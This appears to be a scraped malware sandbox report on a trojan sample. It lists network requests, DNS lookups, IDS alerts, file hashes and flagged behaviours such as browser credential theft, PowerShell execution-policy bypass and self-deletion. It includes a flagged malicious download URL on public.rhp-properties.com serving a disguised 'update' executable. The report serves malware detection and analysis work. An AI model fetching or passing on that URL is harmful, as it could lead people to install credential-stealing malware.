6204	latest.exe	GET	200	12.177.128.130:80	http://public.rhp-properties.com/corporate/support/packages/RHP-Fall-2018-Update.exe	unknown	—	—	malicious
5200	msiexec.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAQoW7DgyeIab0P7NEpaqGM%3D	unknown	—	—	whitelisted
5200	msiexec.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6500	setupdownloader.exe	GET	200	2.22.242.112:80	http://download.bitdefender.com/SMB/Hydra/release/bst_win/7.9.19.477/x64/kit.cat?fakeparam=1301287	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	51.104.136.2:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
3220	svchost.exe	2.16.241.12:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
3220	svchost.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
4712	MoUsoCoreWorker.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
4320	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	12.177.128.130:80	public.rhp-properties.com	ATT-INTERNET4	US	malicious
3220	svchost.exe	51.104.136.2:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6204	latest.exe	12.177.128.130:80	public.rhp-properties.com	ATT-INTERNET4	US	malicious
6868	RHP-Fall-2018-Update.exe	12.177.128.130:80	public.rhp-properties.com	ATT-INTERNET4	US	malicious
1176	svchost.exe	20.190.159.2:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

DNS requests

Domain	IP	Reputation
crl.microsoft.com	2.16.241.12 2.16.241.19	whitelisted
www.microsoft.com	95.101.149.131	whitelisted
google.com	142.250.185.142	whitelisted
public.rhp-properties.com	12.177.128.130	malicious
login.live.com	20.190.159.2 20.190.159.0 20.190.159.4 20.190.159.129 40.126.31.69 40.126.31.73 40.126.31.1 40.126.31.3	whitelisted
ocsp.digicert.com	2.17.190.73	whitelisted
go.microsoft.com	184.28.89.167	whitelisted
cloud-ecs.gravityzone.bitdefender.com	35.212.7.177	whitelisted
cloud.gravityzone.bitdefender.com	35.212.58.191	whitelisted
download.bitdefender.com	2.22.242.112 2.22.242.226 2.19.126.136 2.19.126.150 2.16.10.163 2.16.10.175	whitelisted

Threats

PID	Process	Class	Message
4320	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	A Network Trojan was detected	ET USER_AGENTS Suspicious User-Agent (AutoHotkey)
4320	SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6204	latest.exe	A Network Trojan was detected	ET USER_AGENTS Suspicious User-Agent (AutoHotkey)
6204	latest.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6868	RHP-Fall-2018-Update.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6500	setupdownloader.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6500	setupdownloader.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6500	setupdownloader.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6500	setupdownloader.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6500	setupdownloader.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP

Add for printing

Process	Message
Installer.exe	2025-02-07 18:47:55.468 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] -> AnonID::Init()
Installer.exe	2025-02-07 18:47:55.468 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [truct ServConfig::Product>::Init] Trying standalone IServConfig
Installer.exe	2025-02-07 18:47:55.471 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ ERROR] [ AnonID::Init] failed to get settings plugin as exported plugin
Installer.exe	2025-02-07 18:47:55.471 000000001344 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] <- AnonID::Init() [0]
Installer.exe	2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] <- AnonID::Init() [0]
Installer.exe	2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ ERROR] [ AnonID::Init] failed to get settings plugin as exported plugin
Installer.exe	2025-02-07 18:47:58.232 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [ AnonID::Init] -> AnonID::Init()
Installer.exe	2025-02-07 18:47:58.233 000000004110 006884 006800 [ Installer] [epag.ng.impl] [ TRACE] [truct ServConfig::Product>::Init] Trying standalone IServConfig
Installer.exe	2025-02-07 18:48:00.445 000000006313 006884 006800 [ Installer] [LanguageMana] [ TRACE] [ CLanguageManager::Init] -> CLanguageManager::Init()
Installer.exe	2025-02-07 18:48:00.445 000000006313 006884 006800 [ Installer] [LanguageMana] [ TRACE] [ CLanguageManager::Init] Current init count requested: 1

General Info

SecuriteInfo.com.Trojan.Siggen20.61251.8349.26717

866819A07DD3AA53AC60E54DD1D1EB08

219C643039C6AD89CEB5BB6176577CB94CA187F8

C1066265B02FC53F4F6A5CCCC17BFB4896E35530E37871A5E568D1D855BB9D42

24576:VdHHzimeeg2SUbAztkER0426UY730qnY02:VdHHzipeg2SUbAztkER096UY7kqYH

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

AHK has been detected (YARA)

Uses Task Scheduler to autorun other applications

Starts CMD.EXE for self-deleting

Steals credentials from Web Browsers

Actions looks like stealing of personal data

Bypass execution policy to execute commands

Changes powershell execution policy (Bypass)

SUSPICIOUS

Reads security settings of Internet Explorer

Potential Corporate Privacy Violation

Executable content was dropped or overwritten

Changes internet zones settings

Changes the desktop background image

Process requests binary or script from the Internet

There is functionality for taking screenshot (YARA)

Starts CMD.EXE for commands execution

Reads the date of Windows installation

Application launched itself

Suspicious use of NETSH.EXE

The process creates files with name similar to system file names

The process verifies whether the antivirus software is installed

Checks Windows Trust Settings

Adds/modifies Windows certificates

Hides command output

Reads the Windows owner or organization settings

Runs PING.EXE to delay simulation

Drops 7-zip archiver for unpacking

Process drops legitimate windows executable

The process drops C-runtime libraries

Process uses IPCONFIG to clear DNS cache

Creates a software uninstall entry

Searches for installed software

Unpacks CAB file

Executes as Windows Service

Starts a Microsoft application from unusual location

Uses TASKKILL.EXE to kill process

Restarts service on failure

Starts POWERSHELL.EXE for commands execution

Gets path to any of the special folders (POWERSHELL)

The process executes Powershell scripts

INFO

The sample compiled with english language support

Checks supported languages

Reads the computer name

Checks proxy server information

Detects AutoHotkey samples (YARA)

Mpress packer has been detected

Process checks computer location settings

NirSoft software is detected

Reads the machine GUID from the registry

Reads the software policy settings

Executable content was dropped or overwritten

Starts application with an unusual extension

Create files in a temporary directory

Creates files or folders in the user directory

Creates files in the program directory

Reads CPU info

Reads the time zone

Process checks whether UAC notifications are on

Manual execution by a user

Creates a software uninstall entry

Checks whether the specified file exists (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots